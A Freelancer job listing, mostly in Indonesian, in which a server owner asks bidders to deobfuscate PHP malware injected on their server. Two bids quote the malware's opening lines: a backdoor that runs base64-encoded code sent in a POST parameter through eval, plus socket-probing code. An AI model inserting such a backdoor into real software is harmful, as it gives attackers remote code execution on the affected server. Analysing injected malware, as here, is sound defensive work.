Decrypt malware obcusificated php file

$2-8 USD / hour

Selesai

Dibuat

lebih dari 8 tahun yang lalu

$2-8 USD / hour

I have a few files I need decrypted that have been injected on my server and I desire to know the actual php encrypted. See attached crap code. You'll be getting a 5star review for service within 15 minutes if you know which site that can decrypt it that is :D

JavaScript

Linux

PHP

ID Proyek: 8498530

Tentang proyek

6 proposal

Proyek remot

Aktif 9 tahun yang lalu

Ingin menghasilkan uang?

Alamat email

Keuntungan menawar di Freelancer

Tentukan anggaran dan garis waktu Anda

Dapatkan bayaran atas pekerjaan Anda

Uraikan proposal Anda

Gratis mendaftar dan menawar pekerjaan

Diberikan kepada:

@xpoh

Hello! I can help u with this project. What do u want to get as output? Because this scripts generates html page with javascripts. Contact me to discuss details.

$8 USD dalam 1 hari

5,0

(10 ulasan)

3,4

6 freelancer menawar dengan rata-rata $21 USD/jam untuk pekerjaan ini

@dimkazakos

my price is fixed $30! here there are the first lines: <?php if (isset($_POST['nf385ab'])) { eval(base64_decode($_POST['nf385ab'])); } ?> <?php xxxxxxxxxxxxxxxxxxxxx function itwro48($z26, $xyslz28) { if (function_exists('socket_create') && function_exists('socket_connect') && function_exists('socket_read') && function_exists('socket_write')) { define('SOCKET_TYPE', constant('SOCKET_TYPE_SOCKET')); return TRUE; } if (function_exists('fsockopen')) { define('SOCKET_TYPE', constant('SOCKET_TYPE_FSOCKET')); return TRUE; } if (function_exists('stream_socket_client')) { define('SOCKET_TYPE', constant('SOCKET_TYPE_STREAM')); return TRUE; } define('SOCKET_TYPE', constant('SOCKET_TYPE_NO')); return FALSE; } xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Thank you in advance.

$33 USD dalam 1 hari

5,0

(55 ulasan)

5,3

@unitmatrix

Hello, I am sorry to hear your server injection. I will be glad to help you to read the malware code contents as requested. The attached malware file is not actually encrypted or encoded because you can actually see readable php code in it, but in fact it is obfuscated which means that it is written so that it is very hard to understand as you do not see normal variables or PHP function calls because those are hidden (obfuscated). You will not find a general website that will decode/deobfuscate this for you automatically. I have analyzed the code and here is what I can do for you: I can deobfuscate this this manually for you to the extent where you can read actual PHP function calls and actual variables which will make the code look readable as usual so you can read what the hacker intended to execute on your server. However, I can not guarantee that the code will make sense or will be very easy to understand. I almost got it done for you, I just need your confirmation so I can run the final global replacements. Here is a sample of the first few lines of this file I just decoded: if (isset($_POST['nf385ab'])) { eval(base64_decode($_POST['nf385ab')) } And the code will be made tidy with proper indentations. Please let me know if you need any help, Thank you, Alex

$55 USD dalam 1 hari